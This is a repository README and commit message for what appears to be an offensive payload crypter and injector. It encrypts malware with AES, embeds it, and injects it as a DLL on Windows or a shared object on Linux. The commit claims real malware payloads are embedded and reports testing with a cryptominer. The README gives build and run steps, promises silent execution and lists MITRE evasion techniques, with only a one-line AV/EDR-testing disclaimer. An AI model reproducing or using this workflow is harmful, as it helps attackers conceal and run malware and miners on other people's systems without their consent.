jory/AES-Encrypter-Rust
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
ce77358773
AES-Encrypter-Rust/README.md
JorySeverijnse 59a40a43f6 Complete cross-platform AES injection system 
- Implement AES-128-CBC encryption with SHA256 key derivation
- Add Linux SO injector with dlopen + function calling
- Add Windows DLL injector with NT API + APC queuing
- Create automated build script (build_injectors.sh)
- Generate single encrypted_payload.bin files per platform
- Embed real malware payloads (libphotoshop.dll/so)
- Update documentation and clean up repository
- Linux injector tested with real XMRig mining (700%+ CPU usage)
- Windows injector ready for compilation and testing

Security features:
- AES-128-CBC with random IVs and PKCS7 padding
- SHA256(password + salt) key derivation
- Cross-platform isolation (no code leakage)
- Single encrypted file format per platform
- Embedded payloads with no external dependencies
2025-12-18 13:29:09 +01:00

101 lines
2.8 KiB
Markdown
Raw Blame History

# AES-Encrypted Cross-Platform Payload Injector
Secure AES-CBC encrypted malware injection for Windows (DLL) and Linux (SO) with embedded payloads.
## 🚀 Quick Start
```bash
# Place your malware files in the root directory:
# - libphotoshop.dll (Windows DLL)
# - libphotoshop.so (Linux SO)
# Run the automated build script:
./build_injectors.sh
# This creates:
# - linux_injector (ready to run on Linux)
# - windows_injector.cpp + dll_payload_data.h (for Windows compilation)
```
## 📦 What It Does
### Encryption
- **AES-128-CBC** encryption with random IVs
- **SHA256 key derivation** (password + salt)
- **PKCS7 padding** with validation
- Single `encrypted_payload.bin` file per platform
### Injection
- **Windows:** NT API DLL injection with job freezing + APC queuing
- **Linux:** SO injection with dlopen + function calling
- **Embedded payloads:** No external file dependencies
- **Silent execution:** No visible output or errors
## 🔧 Manual Usage
### Linux Build & Run
```bash
g++ -std=c++11 linux_injector.cpp -o linux_injector -lssl -lcrypto -ldl
./linux_injector # Decrypts and injects embedded SO
```
### Windows Build & Run
```bash
# On Windows with Visual Studio:
cl.exe /EHsc windows_injector.cpp advapi32.lib
# Run the injector:
windows_injector.exe # Decrypts and injects embedded DLL
```
### Custom Encryption
```bash
cd crypt
cargo run ../your_malware.dll # Creates encrypted_payload.bin
# Embed the data in injector source code
```
## 🔒 Security Features
- **AES-128-CBC** with cryptographically secure random IVs
- **SHA256 key derivation** using password + random salt
- **PKCS7 padding** with validation
- **No embedded keys** (derived at runtime)
- **Cross-platform isolation** (Windows code ≠ Linux code)
## 📋 Architecture
```
├── crypt/ # Rust AES encryption tool
├── linux_injector # Linux SO injector (compiled)
├── windows_injector.cpp # Windows DLL injector (source)
├── build_injectors.sh # Automated build script
├── dll_payload_data.h # Windows embedded encrypted DLL
├── so_payload_data.h # Linux embedded encrypted SO
└── decryptor.cpp # Standalone decryption utility
```
## ✅ Verification
**Linux Testing:** ✅ AES decryption + SO injection + mining activity confirmed
**Windows Ready:** ✅ Source prepared with real encrypted DLL payload
## ⚠️ Disclaimer
This is a tool for testing AV/EDR detection capabilities. Use at your own risk.
## 🔍 MITRE ATT&CK
- **T1204.002** - User Execution: Malicious File
- **T1140** - Deobfuscate/Decode Files or Information
- **T1027.009** - Embedded Payloads
- **T1620** - Reflective Code Loading
- **T1055** - Process Injection
## 📚 References
- AES-CBC encryption standard
- OpenSSL crypto library
- Windows CryptoAPI
- Linux dlopen/dlsym
Reference in New Issue View Git Blame Copy Permalink